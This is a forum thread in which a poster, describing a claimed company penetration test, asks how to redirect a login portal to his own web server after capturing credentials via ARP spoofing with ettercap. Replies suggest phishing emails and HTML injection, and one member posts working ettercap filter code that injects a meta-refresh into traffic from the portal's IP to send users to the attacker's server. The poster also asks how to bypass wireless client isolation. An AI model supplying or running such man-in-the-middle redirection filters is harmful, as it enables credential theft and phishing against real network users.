Results 1 to 10 of 11

Thread: Website redirection

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Jan 2006
    Posts
    11

    Default Website redirection

    Hello folks!

    I am doing a pen-test for my company in their new website access, its a website portal, basically you go the site, log in with your username and password, and you will have access to the whole network, ( not the whole network, only if you are the CTO or the network admin).

    so I was able to catch the username and password using ettercap, but they use something call host checker, so my questionis , how can I redirect an specific website using ettercap?

    I can do arp spoofing and works, but, since I am doing a pen-test, the customer has an option called Host Checker, its a little app that runs on the client machine, and make a ssl tunnel, the app checks for antivirus ( if is not up-to-date you wont be able to log in in their website) so, because of this app, I cannot sniff their password, so, here is my quesiton again, how can I redirect the url to my url? for example, if they go to h**p://access.company.com I want to catch the request and send it to h**p://myapacheserver.com, they will see the same page, actually, I am alrady have everything in place, but I dont know yet how to do the redirection website, any idea??? suggestions?? I am using ettercap, but i am open to use anything to achieve this.

    Thanks!

    <-SeRVer->

  2. #2
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    15

    Default

    Quote Originally Posted by Server View Post
    if they go to h**p://access.company.com I want to catch the request and send it to h**p://myapacheserver.com, they will see the same page, actually, I am alrady have everything in place
    How about just mail youre victim width some fake message whichs says: check the new extranet (url) but in your html is your url. That's basicly phissing.

    Or if you have an account search voor htmlinjection vunerability's and try to redirect.
    Two things are infinite: the universe and human stupidity;

  3. #3
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    Maybe you could try sth. like this:

    Code:
    if (ip.proto == TCP && tcp.src == 80) {
    replace("</head>", "<meta http-equiv="Refresh" content="1; url=http://myapacheserver.com"></head>");
    msg("Filter Ran.\n");
    }
    Of course you could also filter just for the page h**tp://access.company.com.
    Don't eat yellow snow :rolleyes:

  4. #4
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    IS the AP wired or wireless?
    dd if=/dev/swc666 of=/dev/wyze

  5. #5
    Just burned his ISO
    Join Date
    Jan 2006
    Posts
    11

    Default

    Thanks for the response.

    Well, they do have an AP, but they use the client isolation option ( does anyone know how to break/by pass this option??).

    hawaii67, I didnt try that, beacuse all the traffic will be redirected to my website, so if the client tried to go to google.com I dont want to see my page, only if they want to go to access.mycompany.com

    any other ideas??/

    Thanks!!!

    <-SeRVer->

  6. #6
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    Here's the spoonfilter:

    Code:
    if (ip.src == 'aa.bb.cc.dd' && tcp.src == 80) {
          replace("<head>", "<head> <meta http-equiv="Refresh" content="0; url=http://myapacheserver.com">");
          msg("Replaced URL\n");
    }
    Where aa.bb.cc.dd is the ip address of access.company.com.
    If a nslookup reveals more ip addresses use this instead

    Code:
    if (ip.src == 'aa.bb.cc.dd' || ip.src == 'ee.dd.ff.gg' || ip.src == 'hh.ii.jj.kk') {

    It works fine with me :-)

    Cheers
    Don't eat yellow snow :rolleyes:

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •